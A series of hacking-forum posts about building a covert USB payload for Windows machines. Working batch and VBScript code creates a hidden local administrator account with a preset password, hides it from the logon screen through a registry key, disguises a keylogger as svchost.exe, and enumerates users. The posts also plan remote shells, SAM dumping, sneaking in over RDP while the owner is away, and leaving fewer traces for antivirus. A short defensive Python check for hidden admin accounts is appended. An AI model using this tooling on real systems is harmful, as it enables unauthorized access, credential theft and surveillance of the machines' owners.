Posts posted by DMilton

  1. Well I am working on a project and I am creating a batch file that will export some "Auto complete" data to a text file silently (using some of the Nirsoft tools), but I was wondering: is there a way to time/date stamp the txt files?

    I know 'time' and %date% will show the date but I can't get the created txt file's name to be either the time or date. Below is the syntax from Nirsoft's web site, but I was wondering if anyone knew what I could use to create:

    \stext %date%.txt

    If you look at the syntax below you will see that in theory that will create a text file with the actual date as the file name... It doesn't. Any ideas?

    /stext <Filename> Save all email accounts into a regular text file.

    /stab <Filename> Save all email accounts into a tab-delimited text file.

    /scomma <Filename> Save all email accounts into a comma-delimited text file.

    /stabular <Filename> Save all email accounts into a tabular text file.

    /shtml <Filename> Save all email accounts into HTML file.

    /sverhtml <Filename> Save all email accounts into HTML file. (vertical)

    /sxml <Filename> Save all email accounts into XML file.

    You can format the date by using a simple VBScript and passing variables to the batch.

    Something like this will give you the date-time in a good aspect:

    Set objShell = CreateObject("Wscript.Shell"
    Set objEnv = objShell.Environment("PROCESS")
    strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
    strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
    'Month/Day/Year
    strFormDate = Right("0" & Month(now()), 2) & "." & Right("0" & Day(now()), 2) & "." & Year(now())
    'HH:MM:SS
    strFormTime = Right("0" & Hour(now()), 2) & "." & Right("0" & Minute(now()), 2) & "." & Right("0" & Second(now()), 2)
    objEnv("Date") = strFormDate
    objEnv("Time") = strFormTime
    strPath = "YOURBATCH.BAT"
    objShell.Run strPath, 1, False

    You can pass the Date and Time vbs variables to the YOURBATCH.BAT to format the time and date of the logs:

    \stext %computername%[%Date%-%Time%].txt
    etc...

    :EDIT

    The first line must be:

    Set objShell = CreateObject("Wscript.Shell")

  2. System.exe detected by NOD32 antivirus as NewHeur_PE (Virus)... When downloading the .rar.

    With the payload.exe, I get another advice with b2e.dll as Win32/Qhost.NFV (Trojan) with NOD32. Is the b2e.dll part of the backdoor?

    I think the payload.exe does the payload.bat stuff with the AdminGroup variable given by 1.vbs, installing all the keylogger and backdoor, opening ports, adding reg keys, etc...?

    Are all the needed programs packed in the payload.exe?

    The medicine continues going wrong with non-conventional paths. It can be done by using a similar way as for installing the payload.

    I like the easy and effective way the keylogger works but it doesn't work with combination of [ALT]. When a combination is pressed (as [CTRL]+something) the [CTRL] is printed many times... I assume no clicks are saved to the keylogger log...

    I will be testing some of the functionalities in a few days.

    Too many things? :lol:

    Good job and many thanks for the credits!

  3. But... what do you want to delete? I think it is not very difficult to script it, but... what to delete? Many files are running in the background (such as system and user files) and can't be deleted. If you want to delete some of them (for example some DLL or some antivirus file), you must kill them (see killing AVs in this forum) or you must do it before the system has been restarted (as done by Unlocker).

    If you tell us what you want to delete, it could be possible to program an application to do the job.

    Is the job you're thinking of white hat hacking?

  4. Some issues and fixing them...

    net user Tanto password /add && net localgroup administrators Tanto /add

    In the adding of the Tanto administrator account, the payload will only create it if the group name of administrators is "administrators" (it's not my case). It will cause an error and will not work for systems on which the Administrators group has been changed to another name or which are installed in another language.

    A solution will be getting the correct administrators group name for a secure creating of the Tanto user.

    This way was the one I was developing in this post. The idea is getting the name of Administrators Group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable.

    ::Hide Tanto's folder from prying eyes
    attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

    Before you attrib anything, you must create the folder, and the batch code doesn't.

    The correct code would be:

    ::Create and hide Tanto's folder from prying eyes
    mkdir %SystemDrive%\docume~1\Tanto
    attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

    ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
    ATTRIB +H %windir%\svchost.exe

    In the attribution of Read-only, Hidden, Archive and System to the keylogger you omitted the +r +a +s.

    Correct line would be:

    ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
    ATTRIB +r +a +s +hH %windir%\svchost.exe

    ::Delete Keylogger
    (
    cd %windir%
    del svchost.exe
    )

    In the deletion task of the svchost.exe file, this code will fail because the payload is running from the USB and not the %Systemdrive%.

    The correct code would be:

    ::Delete Keylogger
    del %windir%\svchost.exe

    SUGGESTIONS

    I prefer to add the name of the account and the password by putting them in a variable at the beginning of the batch, or in an .ini file if it's exe-compiled and can't be edited, so we can add the user we want and not only the Tanto user.

  5. Isn't this like...illegal? (Correct me if I'm wrong though...I thought this place was about the good side of the whole hacking scene.)

    The illegality is not what you have, but what you do with it... If you do illegalities, then it's illegal<_<

  6. If you want, we can code an aspirin for you, man! :lol:

    You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during next days.

    The name of the tool is cool.

    Sleep a bit by now!

    :edit

    By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user.

    It doesn't generate the .txt files, only if I exec it from system drive root.

    When exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe.

    Antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in background.

    I think it can be caused because any problem with path names?

    If you want, PM the source, I'll try a look at it.

  7. That's awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing I was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).

    While you decide what the payload should do, I've been playing with some of your first ideas.

    Executing it will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how to extract the real Administrators Group name in command line, I did it in VBScript, ready to use.

    By the way, here it is the code for the VbScript

    'ListAdminGroup.vbs
    Set objWshNetwork = CreateObject("WScript.Network") 
    Set objShell = CreateObject("Wscript.Shell")
    Set objEnv = objShell.Environment("PROCESS")
    str_PC = objWshNetwork.ComputerName 
    ' SID of the Administrators group
    str_GroupSID = "S-1-5-32-544"
    str_GroupName = GetGroupName(str_PC, str_GroupSID) 
    Set obj_Group = GetObject("WinNT://" & str_PC & "/" _ 
    & str_GroupName & ",group")
    objEnv("AdminGroup") = str_GroupName
    strPath = "start.bat"
    objShell.Run strPath, 1, False
    
    Function GetGroupName(sComputer, sGroupSID) 
    Dim oGroupAccounts, oGroupAccount 
    'Set for WinXP
    Set oGroupAccounts = GetObject( _ 
    "winmgmts://" & sComputer & "/root/cimv2") _ 
    .ExecQuery("Select Name from Win32_Group" _ 
    & " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'") 
    'For Win2k we use the 'BUILTIN' domain
    If oGroupAccounts.Count = 0 Then 
        Set oGroupAccounts = GetObject( _ 
        "winmgmts://" & sComputer & "/root/cimv2") _ 
        .ExecQuery("Select Name from Win32_Group" _ 
        & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'") 
    End If 
    For Each oGroupAccount In oGroupAccounts 
        GetGroupName = oGroupAccount.Name 
    Next 
    End Function

    I think it will work in Windows XP and Windows 2000 but if you can play with it in other versions, will be great.

    Once the script has finished, it launches the start.bat batch. It will create an administrator account whose name is defined in the %NewAdmin% variable, with a password given by the %password% variable, and add it to the Administrators Group, using the variable in %AdminGroup% given by the vbs. It creates the correct folder, hides it, and adds the new account name to the Special Accounts, for being invisible to the user.

    Here it is the start.bat code. By the way, it must be on same dir as VbScript.

    ::start.bat
    @echo off
    set NewAdmin=USBAdmin
    set password=YouWasHacked!
    set Folder=%SystemDrive%\Documents and Settings\%NewAdmin%
    net localgroup %AdminGroup% %NewAdmin% /add
    net user %NewAdmin% %password% /add
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0
    mkdir "%Folder%"
    attrib +a +s +h "%Folder%"

    It will solve too the Tcstool for fewer fingerprints:

    * We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

    About Tcstool question:

    * we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs.

    The code for Users.vbs can be:

    'Users.vbs
    Option Explicit 
    
    
    Dim obj_UserName 
    Dim obj_GroupName 
    Dim obj_PC 
    Dim obj_Group 
    Dim obj_Shell 
    Dim str_Computer 
    Dim str_Name
    Dim objFSO
    Dim objTextFile
    Dim str_File
    Dim M
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    
    If WScript.Arguments.count > 0 Then
        str_File = WScript.Arguments.item(0)
    Else
        str_File = "users.txt"
    End If
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True)
    str_Computer = "." 
    Set obj_Shell = CreateObject("WScript.Shell") 
    str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") 
    Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer") 
    obj_PC.Filter = Array("Group") 
    For Each obj_GroupName In obj_PC
        Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group") 
        obj_Group.members.Filter = Array("User") 
        For Each obj_UserName In obj_Group.members
            set M = obj_UserName 
            objTextFile.WriteLine(obj_UserName.Name)   
        Next 
    Next

    It will extract all users names in a new users.txt file, for further use of it.

    And that's all for the moment! :lol:
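A defender's check for the account pattern this post describes, as an added example that is not part of the original post: it flags names set to DWORD 0 under the SpecialAccounts\UserList key and reports whether each is also a member of the local administrators group (SID S-1-5-32-544, whatever its localized name). The sample command output, the `HelpDesk` account and all function names are constructed for illustration.

```python
import re

# Value lines in `reg query` output look like: "    <name>    REG_DWORD    0x0"
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+REG_DWORD\s+(?P<data>0x[0-9a-fA-F]+)\s*$")

# Constructed sample: `reg query` output for the UserList key named in the post.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    USBAdmin    REG_DWORD    0x0
    HelpDesk    REG_DWORD    0x1
"""

# Constructed sample: `net localgroup Administradores` on a Spanish-language install.
SAMPLE_NET_LOCALGROUP = """
Nombre de alias     Administradores

Miembros

-------------------------------------------------------------------------------
Administrador
USBAdmin
Se ha completado el comando correctamente.
"""


def hidden_accounts(reg_query_output):
    """Names whose UserList DWORD is 0, i.e. accounts kept off the logon screen."""
    hidden = []
    for line in reg_query_output.splitlines():
        match = VALUE_LINE.match(line)
        if match and int(match.group("data"), 16) == 0:
            hidden.append(match.group("name"))
    return hidden


def group_members(net_localgroup_output):
    """Members between the dashed rule and the last line (assumed to be the status message)."""
    lines = [line.strip() for line in net_localgroup_output.splitlines()]
    rule = next((i for i, text in enumerate(lines) if text and set(text) == {"-"}), None)
    if rule is None:
        return []
    return [text for text in lines[rule + 1:] if text][:-1]


def audit(reg_query_output, net_localgroup_output):
    """Report each hidden account and whether it is also a local administrator."""
    admins = {name.lower() for name in group_members(net_localgroup_output)}
    return [{"account": name, "admin": name.lower() in admins}
            for name in hidden_accounts(reg_query_output)]


if __name__ == "__main__":
    for finding in audit(SAMPLE_REG_QUERY, SAMPLE_NET_LOCALGROUP):
        print(finding)
```

An account that is both hidden and an administrator is the combination worth an alert; a hidden non-admin entry is still worth explaining.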

  8. You can uninstall the U3 software and install it again. On the SANDISK web site, you can download utils to do it. There is also a troubleshooting guide HERE

    Try it and tell us if it went ok.

  9. Fail. Server 2003 identifies as 5.2, regardless of whether it's 32 or 64bit. This is due to the fact that XP64 is essentially a client version of Server 2003.

    :angry: That's what occurs when one can't try it in Server 2003... Ok, another thing to think about! <_< I'll be squishing my little brain to find a solution (in batch) for helping in the payload development. Thanks a lot for your memo moonlit.

  10. So I've been contemplating making a new payload for a while... These are some of the things that I want to implement:

    1. No .VBS or .NET

    2. Mostly command line, and the .BATs will all be .EXEs, just because I like those better

    3. Dump SAM or create a New admin, via command line, preferably both

    4. Install a remote shell, this part is already taken care of

    5. Dump a list of all users on the computer

    And that's about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isn't any slurping of docs and what not, maybe pics ;). The dumping part will be done via command line, i.e. run rs.exe, because the shell copies itself once it's run. Other than that I have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.

    For point 5, you can execute this code, it's in VBScript. Of course, it can be modified to show only the users and not the groups...

    UsersGroups.vbs

    'UsersGroups.vbs
    'This script enumerates users, grouped by each local group on a computer
    'It creates a new file called users.txt in the same directory it's executed from.
    'The code has been rebuilt from a similar app, but it works fine
    'DMilton for free community
    'Thread post at http://hak5.org/forums/index.php?showtopic=10746
    
    'Variables explicit declaration
    Option Explicit 
     Dim obj_UserName 
     Dim obj_GroupName 
     Dim obj_PC 
     Dim obj_Group 
     Dim obj_Shell 
     Dim str_PC 
     Dim str_Name
     Dim objFSO
     Dim objTextFile
     Dim I
     Dim ExitFile
     Const ForReading = 1, ForWriting = 2, ForAppending = 8
    'Arguments
     ExitFile = "users.txt"
    'Exit file creation
     Set objFSO = CreateObject("Scripting.FileSystemObject")
     Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True)
    'Local computer var creation str_Name
     str_PC = "." 
     Set obj_Shell = CreateObject("WScript.Shell") 
     str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
    'Creates an object obj_PC containing the current local computer 
     Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer") 
     ObjTextFile.WriteLine("Computer name is: " & str_Name) 
    'Now we filter objects to obtain groups
     obj_PC.Filter = Array("Group") 
    'Going through the objects and writing the txt 
     For Each obj_GroupName In obj_PC 
         'Creating an object obj_Group containing the current group
          Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group") 
          'Writing the txt and formatting it
          objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name) 
          'Filtering objects from the group to obtain users
           obj_Group.members.Filter = Array("User") 
          'Printing each user
           For Each obj_UserName In obj_Group.members
                objTextFile.WriteLine("                  " & obj_UserName.Name)
           Next
    Next 
    'Cleaning the variables
     Set obj_UserName = Nothing 
     Set obj_GroupName = Nothing 
     Set obj_PC = Nothing 
     Set obj_Shell = Nothing

    Moreover, I think that with groups info in the final users.txt, adding a key in registry for creating an admin account is simple, or not?

    net user "USBAdmin" /add
    net localgroup administrator "USBAdmin" /add
    net user "USBAdmin" password

    The problem with adding privileges is that this automation would work in English versions but not in other languages such as Spanish, where the Administrators group is named Administradores, but with the listed groups in the vbs, you can easily extract the correct "Admin"-istrator or "Admin"-istradores word to add the correct privileges.

    Finally, it would be necessary to add "USBAdmin" to the Special Account Users List, by adding a DWORD 0 for the created "USBAdmin" by executing in a batch (or whatever else). In this case, from the command line it would be...

    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0

    :P

  11. Okay, I was told these files are outdated, and I know the gonzor one is because it's giving the 1.2 and he's got the v2.0 out. Hence the reason I was saying the most updated versions.

    It'll be perfect if you do it by yourself, by looking for the outdated files (most of which we can find at the Nirsoft website), searching and grabbing from the Internet, compiling some interesting posts containing new code for implementation, the GonZor 2.0 version... etc.

    And when you have it, the best is that you post it. You can upload the files to the packages point, can correct the obsolete wiki contents, can code some new stuff and create a great USB payload with all this.

    Jokes apart, the one you are looking for is out there, the only thing you have to do is search for it, ElevenWarrior. As I told you a few days ago, googling is one of the best ways to find out what you want, and if not found... search again, and finally: asking.
